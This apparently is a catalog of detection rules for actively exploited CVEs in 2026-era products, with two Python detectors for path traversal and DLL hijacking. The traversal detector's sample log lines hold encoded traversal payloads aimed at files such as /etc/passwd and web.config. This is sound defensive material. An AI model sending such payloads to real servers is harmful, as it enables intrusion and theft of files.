Detects exploitation attempts targeting CVE-2026-42897, a Cross-Site Scripting (XSS) vulnerability in Microsoft Exchange Server. This KEV-listed vulnerability allows attackers to inject malicious scripts into Exchange web interfaces, potentially leading to session hijacking, credential theft, or further lateral movement within the environment. Detection focuses on anomalous HTTP requests to Exchange OWA/ECP endpoints containing XSS payloads, unexpected script execution from Exchange processes, and suspicious web request patterns indicative of active exploitation.
vendor: Microsoft | product: Exchange Server | cwe: CWE-79 | disclosed: May 15, 2026 | cvss: unscored | write-up soon
- CVE-2026-20182 KEV
Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20182)
Detects exploitation attempts of CVE-2026-20182, an authentication bypass vulnerability (CWE-287) in the Cisco Catalyst SD-WAN Controller. This KEV-listed vulnerability allows unauthenticated remote attackers to bypass authentication mechanisms and gain unauthorized access to the SD-WAN management plane. Successful exploitation can lead to full network fabric compromise, configuration tampering, and lateral movement across SD-WAN-connected sites.
vendor: Cisco | product: Catalyst SD-WAN Controller | cwe: CWE-287 | disclosed: May 14, 2026 | cvss: unscored | write-up soon
- CVE-2026-42208 KEV
BerriAI LiteLLM SQL Injection Exploitation (CVE-2026-42208)
Detects exploitation attempts targeting a SQL injection vulnerability in BerriAI LiteLLM (CVE-2026-42208, CWE-89). LiteLLM is a widely deployed LLM proxy/gateway; successful exploitation allows unauthenticated or authenticated attackers to manipulate backend database queries, potentially exfiltrating API keys, user data, model configurations, and spend tracking records. This CVE is listed on the CISA KEV catalog, indicating active exploitation in the wild.
vendor: BerriAI | product: LiteLLM | cwe: CWE-89 | disclosed: May 8, 2026 | cvss: unscored | write-up soon
- CVE-2026-6973 KEV
CVE-2026-6973: Ivanti EPMM Improper Input Validation Exploitation
Detects exploitation attempts targeting CVE-2026-6973, an improper input validation vulnerability in Ivanti Endpoint Manager Mobile (EPMM). This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to bypass authentication or execute unauthorized actions against the EPMM management interface.
vendor: Ivanti | product: Endpoint Manager Mobile (EPMM) | cwe: CWE-20 | disclosed: May 7, 2026 | cvss: unscored | write-up soon
- CVE-2026-0300 KEV
Palo Alto Networks PAN-OS Out-of-bounds Write (CVE-2026-0300)
Detects exploitation attempts targeting CVE-2026-0300, an out-of-bounds write vulnerability (CWE-787) in Palo Alto Networks PAN-OS. This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to execute arbitrary code, crash the device, or escalate privileges on affected PAN-OS appliances. Detection focuses on anomalous management plane activity, unexpected process crashes, memory corruption indicators, and suspicious inbound traffic patterns targeting PAN-OS management interfaces.
vendor: Palo Alto Networks | product: PAN-OS | cwe: CWE-787 | disclosed: May 6, 2026 | cvss: unscored | write-up soon
- CVE-2026-31431 KEV
Linux Kernel Incorrect Resource Transfer Between Spheres (CVE-2026-31431)
CVE-2026-31431 is a Linux Kernel vulnerability classified as CWE-669 (Incorrect Resource Transfer Between Spheres). The flaw allows improper transfer of resources across security boundaries within the kernel, potentially enabling privilege escalation or unauthorized memory access. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers with local access may exploit this to escalate privileges to root or escape container boundaries.
vendor: Linux | product: Kernel | cwe: CWE-669 | disclosed: May 1, 2026 | cvss: unscored | write-up soon
- CVE-2026-41940 KEV
CVE-2026-41940: WebPros cPanel & WHM / WP2 Missing Authentication for Critical Function
CVE-2026-41940 is an actively exploited missing authentication vulnerability (CWE-306) in WebPros cPanel & WHM and WP2 (WordPress Squared). Unauthenticated remote attackers can invoke critical administrative functions without valid credentials, enabling account takeover, malicious plugin installation, privilege escalation, and full server compromise. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: WebPros | product: cPanel & WHM and WP2 (WordPress Squared) | cwe: CWE-306 | disclosed: Apr 30, 2026 | cvss: unscored | write-up soon
- CVE-2024-1708 KEV
ConnectWise ScreenConnect Path Traversal (CVE-2024-1708)
Detects exploitation of CVE-2024-1708, a path traversal vulnerability in ConnectWise ScreenConnect versions prior to 23.9.8. Attackers can traverse outside the intended directory to read, write, or execute arbitrary files on the host. This vulnerability is actively exploited in the wild and listed on CISA KEV. It is commonly chained with CVE-2024-1709 (authentication bypass) to achieve unauthenticated remote code execution.
vendor: ConnectWise | product: ScreenConnect | cwe: CWE-22 | disclosed: Apr 28, 2026 | cvss: unscored | write-up soon
- CVE-2026-32202 KEV
CVE-2026-32202 Microsoft Windows Protection Mechanism Failure
Detects exploitation of CVE-2026-32202, a Microsoft Windows Protection Mechanism Failure vulnerability (CWE-693) listed in CISA KEV. This vulnerability allows attackers to bypass security controls in Windows, potentially enabling privilege escalation, defense evasion, or code execution. Detection focuses on anomalous process behavior, security feature bypass indicators, and suspicious Windows API usage patterns consistent with protection mechanism circumvention.
vendor: Microsoft | product: Windows | cwe: CWE-693 | disclosed: Apr 28, 2026 | cvss: unscored | write-up soon
- CVE-2024-57726 KEV
SimpleHelp Missing Authorization Vulnerability (CVE-2024-57726)
CVE-2024-57726 is a missing authorization vulnerability (CWE-862) in SimpleHelp remote support software versions 5.5.7 and earlier. This CISA KEV-listed vulnerability allows unauthenticated or low-privileged attackers to bypass authorization controls, potentially enabling unauthorized access to administrative functions, file system traversal, or remote code execution on systems running the SimpleHelp server. Active exploitation has been observed in the wild.
vendor: SimpleHelp | product: SimpleHelp | cwe: CWE-862 | disclosed: Apr 24, 2026 | cvss: unscored | write-up soon
- CVE-2024-57728 KEV
SimpleHelp Path Traversal Vulnerability (CVE-2024-57728)
Detects exploitation of CVE-2024-57728, a path traversal vulnerability (CWE-22) in SimpleHelp remote support software versions 5.5.7 and earlier. Attackers can traverse directory boundaries to reach files outside the intended directory, exposing or tampering with credentials, configuration files, and other sensitive system data. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: SimpleHelp | product: SimpleHelp | cwe: CWE-22 | disclosed: Apr 24, 2026 | cvss: unscored | write-up soon
- CVE-2024-7399 KEV
Samsung MagicINFO 9 Server Path Traversal and Arbitrary File Upload
Detects exploitation of CVE-2024-7399, a path traversal and unrestricted file upload vulnerability in Samsung MagicINFO 9 Server. Successful exploitation allows unauthenticated or low-privileged attackers to upload arbitrary files outside the intended directory, potentially leading to remote code execution. This CVE is actively exploited in the wild (CISA KEV).
vendor: Samsung | product: MagicINFO 9 Server | cwe: CWE-22, CWE-434 | disclosed: Apr 24, 2026 | cvss: unscored | write-up soon
- CVE-2026-39987 KEV
Marimo Remote Code Execution via Missing Authentication (CVE-2026-39987)
CVE-2026-39987 is a critical remote code execution vulnerability in the Marimo reactive notebook framework caused by missing authentication (CWE-306) for critical server-side functions. An unauthenticated remote attacker can invoke kernel execution endpoints to run arbitrary Python code in the context of the Marimo server process. This vulnerability is actively exploited in the wild and listed on the CISA KEV catalog.
vendor: Marimo | product: Marimo | cwe: CWE-306 | disclosed: Apr 23, 2026 | cvss: unscored | write-up soon
- CVE-2026-33825 KEV
CVE-2026-33825 - Microsoft Defender Insufficient Access Control Exploitation
Detects exploitation attempts targeting CVE-2026-33825, an insufficient granularity of access control vulnerability (CWE-1220) in Microsoft Defender. This KEV-listed vulnerability allows attackers to bypass Defender access controls, potentially disabling protections, modifying exclusions, or tampering with security configurations without appropriate privilege levels.
vendor: Microsoft | product: Defender | cwe: CWE-1220 | disclosed: Apr 22, 2026 | cvss: unscored | write-up soon
- CVE-2023-27351 KEV
CVE-2023-27351 - PaperCut NG/MF Improper Authentication Exploitation
Detects exploitation attempts targeting CVE-2023-27351, an improper authentication vulnerability (CWE-287) in PaperCut NG/MF print management software. This CISA KEV-listed vulnerability allows unauthenticated attackers to bypass authentication controls, potentially enabling unauthorized access to the PaperCut administration interface and sensitive print management data. Threat actors have actively exploited PaperCut vulnerabilities in the wild for initial access and lateral movement.
vendor: PaperCut | product: NG/MF | cwe: CWE-287 | disclosed: Apr 20, 2026 | cvss: unscored | write-up soon
- CVE-2024-27199 KEV
JetBrains TeamCity Relative Path Traversal (CVE-2024-27199)
Detects exploitation of CVE-2024-27199, a relative path traversal vulnerability in JetBrains TeamCity on-premises. Unauthenticated attackers can traverse directory paths in the TeamCity web server to reach restricted endpoints and files outside the intended web root, potentially leading to information disclosure or limited unauthenticated changes to server settings. It is commonly chained with CVE-2024-27198, the TeamCity authentication bypass disclosed alongside it.
vendor: JetBrains | product: TeamCity | cwe: CWE-23 | disclosed: Apr 20, 2026 | cvss: unscored | write-up soon
- CVE-2025-2749 KEV
Kentico Xperience Path Traversal and Arbitrary File Upload (CVE-2025-2749)
Detects exploitation of CVE-2025-2749, a path traversal and unrestricted file upload vulnerability in Kentico Xperience CMS. Attackers can traverse directory boundaries to write arbitrary files — including web shells — to locations outside the intended upload path, enabling remote code execution on the hosting server. This CVE is listed in the CISA Known Exploited Vulnerabilities catalog.
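The path traversal entries on this page (Cisco SD-WAN Manager, Trend Micro Apex One, ConnectWise ScreenConnect, SimpleHelp, Samsung MagicINFO, JetBrains TeamCity and Kentico Xperience above) all reduce to the same web-log question: does the request path, once decoded the way the target server decodes it, climb above the web root? The following is an added example that stands in for the catalog's KQL/SPL and is not its logic. The access-log lines are constructed; the product paths in them are illustrative, not exploit payloads taken from any advisory. It goes beyond a plain `..` grep: it decodes repeatedly (double encoding), maps overlong UTF-8 forms of the separator, and only flags requests whose segment depth actually drops below the root, so `/docs/a/../b/` is not a hit.

```python
"""Flag HTTP requests whose decoded path escapes the web root.

Added example over constructed access-log lines; not the catalog's KQL/SPL.
"""
import re
from urllib.parse import unquote

# Constructed combined-log style lines (not real traffic). The last one is a true negative.
SAMPLE_LOG = r'''
203.0.113.7 - - [20/Apr/2026:10:01:02 +0000] "GET /SetupWizard.aspx/ HTTP/1.1" 200 512
203.0.113.7 - - [20/Apr/2026:10:01:05 +0000] "GET /App_Extensions/..%2f..%2fweb.config HTTP/1.1" 200 2048
198.51.100.4 - - [20/Apr/2026:10:02:11 +0000] "POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1" 200 99
198.51.100.4 - - [20/Apr/2026:10:02:12 +0000] "GET /media/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0
192.0.2.9 - - [20/Apr/2026:10:03:30 +0000] "GET /static/..%c0%af..%c0%afboot.ini HTTP/1.1" 403 0
192.0.2.9 - - [20/Apr/2026:10:03:31 +0000] "GET /docs/a/../b/index.html HTTP/1.1" 200 300
'''

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Overlong/malformed UTF-8 encodings of '/' and '\' that lenient decoders treat as separators.
OVERLONG_SEP = re.compile(r'%c0%af|%c1%9c|%e0%80%af', re.I)


def normalize_path(raw, max_rounds=3):
    """Strip the query, map overlong separators, percent-decode until stable, unify slashes."""
    path = raw.split('?', 1)[0]
    path = OVERLONG_SEP.sub('/', path)
    for _ in range(max_rounds):              # bounded: handles %252e (double encoding) without looping forever
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace('\\', '/')


def escapes_root(path):
    """Walk the segments; traversal is flagged the moment depth would go below the root."""
    depth = 0
    for seg in path.split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != '.':
            depth += 1
    return False


def find_traversal(log_text):
    """Return one hit per request whose normalized path climbs above the web root."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # unparsable line: skip rather than guess
        norm = normalize_path(m['target'])
        if escapes_root(norm):
            hits.append({'src': m['src'], 'method': m['method'], 'raw': m['target'],
                         'normalized': norm, 'status': int(m['status'])})
    return hits


if __name__ == '__main__':
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

Keep the raw target in the alert alongside the normalized one: a 200 response on a normalized `../../web.config` is the difference between an attempt and a likely success, and the raw encoding tells you which decoder quirk the attacker was counting on.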
vendor: Kentico | product: Kentico Xperience | cwe: CWE-22, CWE-434 | disclosed: Apr 20, 2026 | cvss: unscored | write-up soon
- CVE-2025-32975 KEV
Quest KACE SMA Improper Authentication Exploitation Detected
Detects exploitation attempts against CVE-2025-32975, an improper authentication vulnerability (CWE-287) in Quest KACE Systems Management Appliance (SMA). This KEV-listed vulnerability allows attackers to bypass authentication controls, potentially enabling unauthorized access to the SMA management interface and downstream managed endpoints. Successful exploitation could lead to full appliance compromise and lateral movement across managed systems.
vendor: Quest | product: KACE Systems Management Appliance (SMA) | cwe: CWE-287 | disclosed: Apr 20, 2026 | cvss: unscored | write-up soon
- CVE-2025-48700 KEV
Zimbra Collaboration Suite XSS Exploitation (CVE-2025-48700)
Detects exploitation of a stored or reflected cross-site scripting (XSS) vulnerability in Synacor Zimbra Collaboration Suite (ZCS). This KEV-listed vulnerability allows attackers to inject malicious scripts into the Zimbra web client, potentially leading to session hijacking, credential theft, or further lateral movement within the organization. XSS in webmail platforms is frequently exploited by threat actors to steal session tokens and pivot to email account compromise.
vendor: Synacor | product: Zimbra Collaboration Suite (ZCS) | cwe: CWE-79 | disclosed: Apr 20, 2026 | cvss: unscored | write-up soon
- CVE-2026-20122 KEV
Cisco Catalyst SD-WAN Manager Privileged API Abuse (CVE-2026-20122)
Detects exploitation of CVE-2026-20122, a critical vulnerability in Cisco Catalyst SD-WAN Manager involving incorrect use of privileged APIs (CWE-648). This KEV-listed flaw allows attackers to invoke privileged API endpoints without proper authorization, potentially enabling unauthorized configuration changes, credential harvesting, or full SD-WAN infrastructure takeover. Active exploitation has been observed in the wild per CISA Emergency Directive ED-26-03.
vendor: Cisco product: Catalyst SD-WAN Manager cwe: CWE-648 disclosed: Apr 20, 2026 cvss: unscored · write-up soon
- CVE-2026-20128 KEV
Cisco Catalyst SD-WAN Manager Storing Passwords in a Recoverable Format (CVE-2026-20128)
CVE-2026-20128 affects Cisco Catalyst SD-WAN Manager and involves storing passwords in a recoverable format (CWE-257). An attacker with local or network access to the SD-WAN Manager may be able to extract plaintext or weakly-obfuscated credentials from configuration files, databases, or memory. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation could lead to credential theft enabling lateral movement, further network compromise, or full SD-WAN infrastructure takeover.
vendor: Cisco product: Catalyst SD-WAN Manager cwe: CWE-257 disclosed: Apr 20, 2026 cvss: unscored · write-up soon
- CVE-2026-20133 KEV
Cisco Catalyst SD-WAN Manager Sensitive Information Exposure (CVE-2026-20133)
Detects exploitation attempts targeting CVE-2026-20133, a CWE-200 information disclosure vulnerability in Cisco Catalyst SD-WAN Manager that allows unauthorized actors to access sensitive configuration and credential data. This vulnerability is actively exploited in the wild (CISA KEV) and may be leveraged to pivot into SD-WAN infrastructure.
vendor: Cisco product: Catalyst SD-WAN Manager cwe: CWE-200 disclosed: Apr 20, 2026 cvss: unscored · write-up soon
- CVE-2026-34197 KEV
Apache ActiveMQ Improper Input Validation (CVE-2026-34197)
Detects exploitation of CVE-2026-34197, an improper input validation vulnerability (CWE-20/CWE-94) in Apache ActiveMQ that has been added to the CISA Known Exploited Vulnerabilities catalog. Successful exploitation may allow remote attackers to execute arbitrary code or inject malicious content via crafted messages or broker connections. ActiveMQ's OpenWire protocol and web console are common attack surfaces for this class of vulnerability.
vendor: Apache product: ActiveMQ cwe: CWE-20, CWE-94 disclosed: Apr 16, 2026 cvss: unscored · write-up soon
- CVE-2009-0238 KEV
Microsoft Office Remote Code Execution (CVE-2009-0238)
CVE-2009-0238 is a remote code execution vulnerability in Microsoft Office (addressed in MS09-009) caused by improper handling of specially crafted Excel files, leading to arbitrary code execution in the context of the logged-on user. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog and has been actively exploited in the wild via malicious Office documents delivered through phishing campaigns.
vendor: Microsoft product: Office cwe: CWE-94 disclosed: Apr 14, 2026 cvss: unscored · write-up soon
- CVE-2026-32201 KEV
Microsoft SharePoint Server Improper Input Validation (CVE-2026-32201)
Detects exploitation of CVE-2026-32201, an improper input validation vulnerability in Microsoft SharePoint Server. This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to send crafted HTTP requests to SharePoint endpoints to bypass input validation controls, potentially enabling unauthorized access, remote code execution, or data exfiltration. CWE-20 class vulnerabilities in SharePoint have historically been leveraged for initial access and lateral movement in enterprise environments.
vendor: Microsoft product: SharePoint Server cwe: CWE-20 disclosed: Apr 14, 2026 cvss: unscored · write-up soon
- CVE-2012-1854 KEV
CVE-2012-1854 - Microsoft VBA Insecure Library Loading (DLL Hijacking)
Detects exploitation of CVE-2012-1854, a DLL hijacking vulnerability in Microsoft Visual Basic for Applications (VBA). Attackers can place a malicious DLL in a directory searched before the legitimate library path, causing Office applications loading VBA to execute attacker-controlled code. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
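To make the search-order point concrete, here is an added Python check that is neither Microsoft's guidance nor the detection logic this catalog ships. It runs over constructed Sysmon-style image-load records (the Event ID 7 fields the check needs; the paths, DLL names and process list are invented). It first builds a baseline of DLL names that the data set itself shows loading from trusted directories, then flags an Office process that loads a DLL of the same name from a user profile or UNC path, or that loads an unsigned module from such a place, which is the footprint a planted library leaves when it wins the search order.

```python
import ntpath
from dataclasses import dataclass

# Assumed trusted roots (lowercase, compared by prefix) and the Office hosts this check covers.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64",
                r"c:\program files", r"c:\program files (x86)")
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}


@dataclass(frozen=True)
class ImageLoad:
    """The Sysmon Event ID 7 fields this check needs."""
    image: str          # process that performed the load
    image_loaded: str   # full path of the DLL
    signed: bool        # Sysmon 'Signed' field


# Constructed records, not real telemetry.
SAMPLE_EVENTS = [
    ImageLoad(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\version.dll", True),
    ImageLoad(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Program Files\Microsoft Office\root\Office16\VBE7.DLL", True),
    ImageLoad(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Users\alice\Downloads\invoice\version.dll", False),
    ImageLoad(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"\\fileserver\share\q2\helper.dll", False),
    ImageLoad(r"C:\Windows\System32\notepad.exe",
              r"C:\Users\alice\AppData\Local\Temp\x.dll", False),
]


def under(path, roots):
    """True if path (Windows syntax) sits under one of roots; pure string logic, runs anywhere."""
    p = ntpath.normpath(path).lower()
    return any(p == r or p.startswith(r + "\\") for r in roots)


def is_trusted_dir(path):
    return under(path, TRUSTED_DIRS)


def is_remote(path):
    return path.startswith("\\\\")


def detect_hijacks(events):
    """Return [(event, reasons)] for Office image loads consistent with search-order hijacking."""
    # Baseline: DLL names this data set shows loading from trusted locations.
    system_names = {ntpath.basename(e.image_loaded).lower()
                    for e in events if is_trusted_dir(e.image_loaded)}
    findings = []
    for e in events:
        host = ntpath.basename(e.image).lower()
        if host not in OFFICE_HOSTS or is_trusted_dir(e.image_loaded):
            continue
        name = ntpath.basename(e.image_loaded).lower()
        reasons = []
        if name in system_names:
            reasons.append(f"{name} normally loads from a system directory")
        if not e.signed:
            reasons.append("unsigned module")
        if is_remote(e.image_loaded):
            reasons.append("loaded from UNC path")
        elif under(e.image_loaded, (r"c:\users",)):
            reasons.append("loaded from user-writable profile directory")
        if reasons:
            findings.append((e, reasons))
    return findings


if __name__ == "__main__":
    for event, reasons in detect_hijacks(SAMPLE_EVENTS):
        print(f"{ntpath.basename(event.image)} <- {event.image_loaded}: " + "; ".join(reasons))
```

The baseline is derived from the same batch of events only to keep the block self-contained; in production it would come from a longer window or a curated list of system DLL names, and the notepad.exe record shows why the host filter matters: the same untrusted load from a non-Office process is left for a separate, broader rule.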
vendor: Microsoft product: Visual Basic for Applications (VBA) cwe: CWE-426 disclosed: Apr 13, 2026 cvss: unscored · write-up soon
- CVE-2020-9715 KEV
Adobe Acrobat Use-After-Free Exploitation (CVE-2020-9715)
Detects exploitation of CVE-2020-9715, a use-after-free vulnerability in Adobe Acrobat that allows arbitrary code execution. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and has been actively exploited in the wild. Attackers typically deliver malicious PDF documents that trigger memory corruption upon rendering, leading to code execution in the context of the Acrobat process.
vendor: Adobe product: Acrobat cwe: CWE-416 disclosed: Apr 13, 2026 cvss: unscored · write-up soon
- CVE-2023-21529 KEV
Microsoft Exchange Server Deserialization of Untrusted Data (CVE-2023-21529)
Detects exploitation attempts targeting CVE-2023-21529, a deserialization of untrusted data vulnerability in Microsoft Exchange Server. Successful exploitation may allow remote code execution by sending crafted requests that trigger unsafe deserialization of attacker-controlled objects.
vendor: Microsoft product: Exchange Server cwe: CWE-502 disclosed: Apr 13, 2026 cvss: unscored · write-up soon
- CVE-2023-36424 KEV
CVE-2023-36424 - Microsoft Windows Out-of-Bounds Read Exploitation
Detects exploitation attempts of CVE-2023-36424, a Microsoft Windows out-of-bounds read vulnerability (CWE-125) listed in CISA's Known Exploited Vulnerabilities catalog. Out-of-bounds read vulnerabilities in Windows kernel or system components can be leveraged for privilege escalation, information disclosure, or as a stepping stone in exploit chains. This detection monitors for anomalous process behavior, crash artifacts, and privilege escalation patterns consistent with exploitation of this class of vulnerability.
vendor: Microsoft product: Windows cwe: CWE-125 disclosed: Apr 13, 2026 cvss: unscored · write-up soon
- CVE-2025-60710 KEV
Microsoft Windows Link Following Vulnerability (CVE-2025-60710)
CVE-2025-60710 is an actively exploited Microsoft Windows link following vulnerability (CWE-59) that allows an attacker to abuse symbolic links or junction points to redirect file operations to unintended locations. This class of vulnerability is commonly leveraged for privilege escalation, file tampering, or unauthorized access to protected resources. The vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog, indicating confirmed in-the-wild exploitation.
vendor: Microsoft product: Windows cwe: CWE-59 disclosed: Apr 13, 2026 cvss: unscored · write-up soon
- CVE-2026-21643 KEV
Fortinet FortiClient EMS SQL Injection Exploitation (CVE-2026-21643)
Detects exploitation attempts targeting a SQL injection vulnerability in Fortinet FortiClient EMS (CVE-2026-21643). This KEV-listed vulnerability allows unauthenticated or authenticated attackers to inject malicious SQL statements into FortiClient EMS, potentially enabling data exfiltration, authentication bypass, or remote code execution via database-level commands such as xp_cmdshell.
vendor: Fortinet product: FortiClient EMS cwe: CWE-89 disclosed: Apr 13, 2026 cvss: unscored · write-up soon
- CVE-2026-34621 KEV
Adobe Acrobat and Reader Prototype Pollution Vulnerability (CVE-2026-34621)
Detects exploitation of CVE-2026-34621, a prototype pollution vulnerability (CWE-1321) in Adobe Acrobat and Reader. This KEV-listed vulnerability allows attackers to manipulate JavaScript object prototypes within PDF processing, potentially leading to arbitrary code execution, privilege escalation, or sandbox escape. Exploitation typically occurs via malicious PDF documents that trigger prototype chain manipulation during rendering or form processing.
vendor: Adobe product: Acrobat and Reader cwe: CWE-1321 disclosed: Apr 13, 2026 cvss: unscored · write-up soon
- CVE-2026-1340 KEV
Ivanti EPMM Code Injection Exploitation (CVE-2026-1340)
Detects exploitation attempts targeting CVE-2026-1340, a code injection vulnerability (CWE-94) in Ivanti Endpoint Manager Mobile (EPMM). This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and allows remote attackers to inject and execute arbitrary code via the EPMM management interface. Successful exploitation may lead to full device management compromise, lateral movement, and data exfiltration from enrolled mobile devices.
vendor: Ivanti product: Endpoint Manager Mobile (EPMM) cwe: CWE-94 disclosed: Apr 8, 2026 cvss: unscored · write-up soon
- CVE-2026-35616 KEV
CVE-2026-35616 — Fortinet FortiClient EMS Improper Access Control Exploitation
Detects exploitation attempts targeting CVE-2026-35616, an improper access control vulnerability (CWE-284) in Fortinet FortiClient Enterprise Management Server (EMS). This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may leverage this flaw to bypass access controls on the EMS server, potentially enabling unauthorized configuration changes, endpoint agent manipulation, or lateral movement through managed endpoints.
vendor: Fortinet product: FortiClient EMS cwe: CWE-284 disclosed: Apr 6, 2026 cvss: unscored · write-up soon
- CVE-2026-3502 KEV
TrueConf Client Download of Code Without Integrity Check (CVE-2026-3502)
Detects exploitation of CVE-2026-3502, a CWE-494 (Download of Code Without Integrity Check) vulnerability in TrueConf Client. An attacker with a network position to intercept or manipulate TrueConf Client update/download channels can deliver unsigned or tampered code to client systems, enabling arbitrary code execution. This CVE is listed on the CISA KEV catalog, indicating active exploitation in the wild.
vendor: TrueConf product: Client cwe: CWE-494 disclosed: Apr 2, 2026 cvss: unscored · write-up soon
- CVE-2026-5281 KEV
CVE-2026-5281 — Google Dawn Use-After-Free Exploitation
Detects exploitation of CVE-2026-5281, a use-after-free vulnerability in Google Dawn (the WebGPU implementation used by Chrome). Exploitation may result in renderer compromise, sandbox escape, or arbitrary code execution via a malicious web page. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Google product: Dawn cwe: CWE-416 disclosed: Apr 1, 2026 cvss: unscored · write-up soon
- CVE-2026-3055 KEV
Citrix NetScaler Out-of-Bounds Read (CVE-2026-3055)
Detects exploitation attempts targeting CVE-2026-3055, an out-of-bounds read vulnerability (CWE-125) in Citrix NetScaler ADC and NetScaler Gateway. This vulnerability is actively exploited in the wild (CISA KEV) and may allow unauthenticated remote attackers to read sensitive memory contents, potentially leading to information disclosure or enabling further attacks. Detection focuses on anomalous HTTP request patterns, NetScaler management plane access, and memory-related crash indicators.
vendor: Citrix product: NetScaler cwe: CWE-125 disclosed: Mar 30, 2026 cvss: unscored · write-up soon
- CVE-2025-53521 KEV
F5 BIG-IP Stack-Based Buffer Overflow Exploitation (CVE-2025-53521)
Detects exploitation attempts and post-exploitation activity related to CVE-2025-53521, a stack-based buffer overflow vulnerability (CWE-121) in F5 BIG-IP. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and may allow remote attackers to execute arbitrary code or cause denial of service by sending crafted requests that overflow stack buffers in BIG-IP processing components.
vendor: F5 product: BIG-IP cwe: CWE-121 disclosed: Mar 27, 2026 cvss: unscored · write-up soon
- CVE-2026-33634 KEV
Aquasecurity Trivy Embedded Malicious Code (CVE-2026-33634)
CVE-2026-33634 describes an embedded malicious code vulnerability (CWE-506) in Aquasecurity Trivy, a widely-used open-source vulnerability scanner. A compromised or trojanized Trivy binary may execute attacker-controlled code during container image scanning, CI/CD pipeline runs, or Kubernetes admission checks. Because Trivy is frequently granted elevated permissions to access container registries, Kubernetes API servers, and cloud credential chains, a backdoored instance poses critical supply-chain risk: exfiltration of secrets, lateral movement into CI/CD infrastructure, and persistent implant installation. This detection monitors for anomalous process behavior, unexpected network egress, and suspicious file activity originating from Trivy processes.
vendor: Aquasecurity product: Trivy cwe: CWE-506 disclosed: Mar 26, 2026 cvss: unscored · write-up soon
- CVE-2026-33017 KEV
CVE-2026-33017: Langflow Code Injection Vulnerability
Detects exploitation of CVE-2026-33017, a code injection vulnerability in Langflow that allows unauthenticated or low-privileged attackers to execute arbitrary code via the Langflow API. The vulnerability stems from improper input validation (CWE-94/CWE-95) combined with missing authentication controls (CWE-306), enabling remote code execution against Langflow instances. This CVE is on the CISA KEV list, indicating active exploitation in the wild.
vendor: Langflow product: Langflow cwe: CWE-94, CWE-95 disclosed: Mar 25, 2026 cvss: unscored · write-up soon
- CVE-2025-31277 KEV
Apple Multiple Products Buffer Overflow Exploitation (CVE-2025-31277)
Detects potential exploitation of CVE-2025-31277, a buffer overflow vulnerability (CWE-119) affecting multiple Apple products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation may allow attackers to execute arbitrary code, escalate privileges, or cause denial of service on affected Apple devices and systems.
vendor: Apple product: Multiple Products cwe: CWE-119 disclosed: Mar 20, 2026 cvss: unscored · write-up soon
- CVE-2025-32432 KEV
CVE-2025-32432: Craft CMS Remote Code Injection
Detects exploitation of CVE-2025-32432, a critical code injection vulnerability (CWE-94) in Craft CMS that allows remote attackers to execute arbitrary code. This vulnerability is actively exploited in the wild (CISA KEV) and targets Craft CMS installations via malicious template or input injection vectors.
vendor: Craft CMS product: Craft CMS cwe: CWE-94 disclosed: Mar 20, 2026 cvss: unscored · write-up soon
- CVE-2025-43510 KEV
Apple Multiple Products Improper Locking Vulnerability (CVE-2025-43510)
CVE-2025-43510 is an improper locking vulnerability (CWE-667) affecting multiple Apple products, including macOS, iOS, iPadOS, tvOS, visionOS, and watchOS. This flaw, added to CISA's Known Exploited Vulnerabilities catalog, allows an attacker with local access to potentially exploit race conditions arising from improper mutex or lock management, leading to privilege escalation, memory corruption, or kernel-level code execution. Detection focuses on anomalous kernel panics, unexpected privilege escalations, exploitation of race conditions, and post-exploitation indicators on Apple endpoints.
vendor: Apple product: Multiple Products cwe: CWE-667 disclosed: Mar 20, 2026 cvss: unscored · write-up soon
- CVE-2025-43520 KEV
Apple Multiple Products Classic Buffer Overflow Exploitation (CVE-2025-43520)
Detects exploitation attempts targeting CVE-2025-43520, a classic buffer overflow vulnerability (CWE-120) affecting Apple Multiple Products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Buffer overflow exploitation may manifest as abnormal process crashes, memory corruption signals, unexpected child process spawning from Apple system processes, or anomalous network connections following process exploitation.
vendor: Apple product: Multiple Products cwe: CWE-120 disclosed: Mar 20, 2026 cvss: unscored · write-up soon
- CVE-2025-54068 KEV
Laravel Livewire Code Injection (CVE-2025-54068)
Detects exploitation of CVE-2025-54068, a code injection vulnerability in Laravel Livewire. This KEV-listed vulnerability allows attackers to inject and execute arbitrary PHP code through Livewire component handling, potentially leading to remote code execution on affected Laravel applications.
